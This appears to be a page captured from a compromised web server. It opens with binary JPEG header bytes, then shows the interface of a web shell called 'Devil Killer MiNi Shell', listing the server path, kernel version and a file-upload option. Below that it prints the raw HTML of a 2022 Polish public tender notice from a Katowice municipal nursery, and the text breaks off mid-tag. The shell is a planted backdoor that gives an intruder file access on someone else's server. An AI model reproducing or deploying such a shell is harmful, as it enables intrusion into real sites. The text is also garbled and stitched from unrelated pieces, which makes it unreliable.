JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221110/0043414101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego w Katowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Żłobek Miejski w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270236733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sokolska 26</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-086</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322539677</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zlobek.katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.zlobek.katowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego w Katowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fdac6451-5b53-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00434141</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045438/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego w Katowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.bip.zlobek.katowice.pl ; https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu mini Portalu https://miniportal.uzp.gov.pl/, ePUAPu<br/>https://epuap.gov.pl/wps/portal.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. ). Korespondencja przesłana za<br/>pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP). Zamawiający dopuszcza również możliwość składania<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej,<br/>na adres email zamowienia@zlobek.katowice.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta musi być sporządzona w języku<br/>polskim, w postaci elektronicznej w formacie danych:. pdf., doc.,docx., rtf., xps., odt. i opatrzona kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Wykonawca w celu poprawnego zaszyfrowania oferty powinien mieć zainstalowany na komputerze.NETFramework4.5. Aplikacja<br/>działa na platformie Windows (VistaSP2,7,8,10) Aplikacja nie jestdostępna dla systemu Linux i MACOS. Sposób zaszyfrowania<br/>oferty opisany został w Instrukcji<br/>użytkownika dostępnej na miniPortalu. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do<br/>reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>Jeżeli na ofertę składa się kilka dokumentów, Wykonawca powinien stworzyć folder, do którego przeniesie wszystkie dokumenty<br/>oferty podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Następnie z tego folderu<br/>Wykonawca zrobi folder.zip (bez<br/>nadawania mu haseł i bez szyfrowania) W kolejnym kroku za pośrednictwem Aplikacji do szyfrowania .Wykonawca zaszyfruje folder<br/>zawierający dokumenty składające się na ofertę. Wykonawca może złożyć tylko jedną ofertę.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Obowiązek informacyjny w stosunku do osób<br/>fizycznych będących dostawcami lub osób działających z upoważnienia dostawców Administratora.Zgodnie z art. 13 i 14 ogólnego<br/>rozporządzenia o ochronie danych (dalej: RODO) informujemy, że:Administratorem Pani/Pana danych osobowych jest Żłobek Miejski<br/>w Katowicach z siedzibą przy ul. Sokolskiej 26, 40 -086 Katowice, będący jednostką organizacyjną miasta Katowice prowadzącą<br/>gospodarkę finansową na zasadach jednostki budżetowej, www.zlobek.katowice.pl.Dane kontaktowe inspektora ochrony<br/>danych:inspektor.ochrony.danych@zlobek.katowice.pl Celami przetwarzania danych osobowych są: zawarcie i wykonanie umów<br/>łączących strony – podstawą prawną przetwarzania danych jest art. 6 ust. 1 lit. b) RODO (dotyczy sytuacji, kiedy osoby, których dane<br/>dotyczą są stronami umów albo Administrator podejmuje działania z inicjatywy tych osób w celu ich zawarcia w szczególności w<br/>związku z konkursami ofert lub postępowaniami przetargowymi); wykonanie obowiązków prawnych ciążących na Administratorze –<br/>podstawa prawna to art. 6 ust. 1 lit. c) RODO, w szczególności związanego z obowiązkiem przechowywania dokumentacji księgowej<br/>wynikającego z ustawy o rachunkowości; realizacja innych celów wynikających z prawnie uzasadnionych interesów realizowanych<br/>przez Administratora na podstawie art. 6 ust. 1 lit. f) RODO takich jak:realizacja umowy, w przypadku, nie jest Pani/Pan stroną<br/>umowy, ale działa Pani/Pan z upoważnienia strony umowy,marketing bezpośredni,ustalanie, obrona i dochodzenie<br/>roszczeń,tworzenie statystyk, analiz i zestawień na potrzeby Administratora.Kategorie odnośnych danych osobowych, które mogą<br/>być przetwarzane w związku z umową i w celu jej sprawnej realizacji przez osoby działające z upoważnienia strony umowy takie jak:<br/>imię, nazwisko, stanowisko, zakres kompetencji, zakres upoważnienia określonego przez stronę umowy oraz dane kontaktowe takie<br/>jak nr telefonów i adresy mailowe, a w przypadkach konieczności identyfikacji uprawnień konkretnej osoby również nr PESEL albo nr<br/>dowodu tożsamości. Odbiorcami Pani/Pana danych osobowych mogą być: Poczta Polska, firmy kurierskie lub transportowe,firmy<br/>ubezpieczeniowe, firmy zapewniające wsparcie IT dla Administratora, partnerzy handlowi Administratora, biuro rachunkowe, firmy<br/>windykacyjne, a także banki. Ponadto w zakresie określonym przez przepisy prawa odbiorcami Pani/Pana danych osobowych mogą<br/>być również pozostali oferenci oraz osoby odwiedzające Biuletyn Informacji Publicznej Administratora. Administrator danych nie<br/>zamierza przekazywać danych osobowych, które Pani/Pana dotyczą do państw trzecich oraz organizacji międzynarodowych. Okres,<br/>przez który dane osobowe będą przechowywane: w zakresie zawartej umowy, przez okres do czasu zakończenia jej realizacji, a po<br/>tym czasie przez okres wymagany przez przepisy prawa lub do przedawnienia roszczeń.8. Ma Pani/Pan prawo do:a) żądania od<br/>Administratora dostępu do swoich danych osobowych,sprostowania swoich danych osobowych,żądania od<br/>Administratora usunięcia lub ograniczenia przetwarzania swoich danych osobowych, jeżeli Administrator nie ma uzasadnionych<br/>prawnie podstaw do ich dalszego przetwarzania,wniesienia sprzeciwu wobec przetwarzania,przenoszenia swoich danych,wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych. Podanie danych jest warunkiem zawarcia umowy, konsekwencją niepodania danych jest brak możliwości jej zawarcia lub realizacji.W oparciu o dane, które Pani/Pana dotyczą Administrator nie<br/>będzie podejmował decyzji w sposób zautomatyzowany, nie będą one także poddawane profilowaniu na zasadach określonych w<br/>art. 22 RODO.Źródłem, z którego Administrator otrzymuje Pani/Pana dane osobowe do celów kontaktowych niezbędnych do<br/>realizacji umów, w przypadkach, w<br/>których nie otrzymaliśmy ich od Pani/Pana, są strony umów lub osoby przez nie upoważnione do ich przekazania w celu realizacji<br/>tych umów.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.26.8.2022.MR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 640281,31 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 Wyposażenie dodatkowych miejsc dla 32 dzieci.<br/>Przedmiotem zamówienia jest Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/><br/>Dostawa zamówień zostanie zrealizowana według faktycznych potrzeb każdego Oddziału Żłobka na podstawie zamówień złożonych przez przedstawiciela Zamawiającego. Zamówienie realizowane będzie w ramach 5 (pięciu) zadań.Przedmiot zamówienia musi być zrealizowany przez Wykonawcę zgodnie ze wskazaniami określonymi przez Zamawiającego: asortymentem, ilościami i wymaganiami określonymi w załączniku do SWZ nr 4.1;<br/><br/> Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.2;4.3;4.4;4.5. do SWZ. <br/>Za ofertę równoważną Zamawiający uzna taką, w której Wykonawca oferuje wyposażenie /artykuły o takich jednakowych parametrach i funkcjach lub zbieżnych do tych, które zostały sprecyzowane w opisie poszczególnych pozycji.<br/>Jeżeli w dokumentacji stanowiącej załączniki do SWZ wskazuje się dla niektórych, wyrobów nazwy, znaki towarowe, patenty lub po¬chodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zama¬wiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym. Ciężar wykazania tej zgodności spoczywa na Wykonawcy.<br/> Zamawiający dopuszcza składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z dokumentacją. Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat, Wykonawca złoży wówczas wraz z ofertą. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70227,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37500000-3 - Gry i zabawki, wyposażenie parków zabaw</p> <p class="mb-0">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</p> <p class="mb-0">37800000-6 - Wyroby rękodzielnicze i artystyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował kryterium cenowym oraz kryterium dotyczącym okresu gwarancji. <br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>Za najkorzystniejszą zostanie uznana oferta z najwyższą ilością punktów. <br/>W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty o takiej samej cenie i okresie gwarancji, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego -ofert dodatkowych zawierających nową cenę i okres gwarancji wyższy lub taki sam o ile był najwyższy przy składaniu ofert. <br/><br/>Ocena punktowa w kryterium „Łączna cena ofertowa brutto” dokonana zostanie na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli z SWZ.<br/>Ocena punktowa - okres gwarancji dokonana zostanie na podstawie okresu gwarancji wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli SWZ.<br/>Ocena ofert w oparciu o kryterium okres gwarancji klasyfikuje się następująco: <br/>1)	36 miesięcy -40 pkt; <br/>2)	24 miesiące- 0 pkt<br/><br/><br/>Kryterium-okres gwarancji rozpatrywane będzie na podstawie zadeklarowanego przez Wykonawcę okresu w Formularzu Oferty.<br/>-Najkrótszy możliwy okres gwarancji -24 miesięce.<br/>-Najdłuższy możliwy okres gwarancji -36 miesięcy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 Doposażenie Oddziałów Żłobka<br/>Przedmiotem zamówienia jest Dostawa mebli, zabawek, pomocy dydaktycznych oraz innego wyposażenia dla 13 Oddziałów Żłobka Miejskiego na terenie miasta Katowice, tj. <br/>1)	Oddział przy ul. Ligonia 43,<br/>2)	Oddział przy ul. Szeptyckiego 1,<br/>3)	Oddział przy ul. Ordona 3a,<br/>4)	Oddział przy ul. Bytomska 8a,<br/>5)	Oddział przy ul. Tysiąclecia 45,<br/>6)	Oddział przy ul. Uniwersytecka 15,<br/>7)	Oddział przy ul. Grzegorzka 2<br/>8)	Oddział przy ul. Zadole 24 a, <br/>9)	Oddział przy ul. Marcinkowskiego 13 <br/>10)	Oddział przy ul. Wojciecha 23A<br/>11)	Oddział przy ul. Ciesielska 1<br/>12)	Oddział przy ul. Boya Żeleńskiego 30<br/>13)	Oddział przy ul. Krzywoustego 9 <br/><br/>Dostawa zamówień zostanie zrealizowana według faktycznych potrzeb każdego Oddziału Żłobka na podstawie zamówień złożonych przez przedstawiciela Zamawiającego. Zamówienie realizowane będzie w ramach 5 (pięciu) zadań. Przedmiot zamówienia musi być zrealizowany przez Wykonawcę zgodnie ze wskazaniami określonymi przez Zamawiającego: asortymentem, ilościami i wymaganiami określonymi w załączniku do SWZ nr 4.2;<br/>Zamawiający dopuszcza rozwiązania równoważne opisywane w Załączniku od nr 4.1;4.2;4.3;4.4;4.5. do SWZ. <br/>Za ofertę równoważną Zamawiający uzna taką, w której Wykonawca oferuje wyposażenie /artykuły o takich jednakowych parametrach i funkcjach lub zbieżnych do tych, które zostały sprecyzowane w opisie poszczególnych pozycji.<br/>Jeżeli w dokumentacji stanowiącej załączniki do SWZ wskazuje się dla niektórych, wyrobów nazwy, znaki towarowe, patenty lub po¬chodzenie, źródło lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego Wykonawcę to wszystkie użyte nazwy, znaki towarowe, pochodzenie mają tylko takie znaczenie, że określają minimalne parametry techniczne i jakościowe wyrobów, urządzeń oraz materiałów wymaganych przez Zamawiającego do wykonania przedmiotu zamówienia. Zama¬wiający dopuszcza możliwość zastosowania innych materiałów, wyrobów i urządzeń, niż wskazane w/w dokumentach z zastrzeżeniem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały, wyroby i urządzenia równoważne). Wykonawca, który przewiduje stosowanie materiałów, wyrobów i urządzeń równoważnych w stosunku do tych wskazanych w dokumentacji ma obowiązek wskazać jakie materiały, wyroby lub urządzenia zastosuje. Jakość materiałów, wyrobów i innych urządzeń użytych do wykonania przedmiotu zamówienia musi być zgodna z normami, atestami, świadectwami dopuszczenia do stosowania. Użyte materiały i urządzenia winny być w I gatunku jakościowym i wymiarowym. Ciężar wykazania tej zgodności spoczywa na Wykonawcy.<br/> Zamawiający dopuszcza składanie ofert z rozwiązaniami równoważnymi, o ile zapewnią one zgodność realizacji przedmiotu zamówienia z dokumentacją. Opis każdego produktu równoważnego np. szczegółowa karta produktu, deklaracja zgodności, protokół z badań laboratoryjnych czy certyfikat, Wykonawca złoży wówczas wraz z ofertą. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 326005,68 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37000000-8 - Instrumenty muzyczne, artykuły sportowe, gry, zabawki, wyroby rzemieślnicze, materiały i akcesoria artystyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31500000-1 - Urządzenia oświetleniowe i lampy elektryczne</p> <p class="mb-0">39162100-6 - Pomoce dydaktyczne</p> <p class="mb-0">37500000-3 - Gry i zabawki, wyposażenie parków zabaw</p> <p class="mb-0">37300000-1 - Instrumenty muzyczne i ich części</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-21</span></h3> <h3 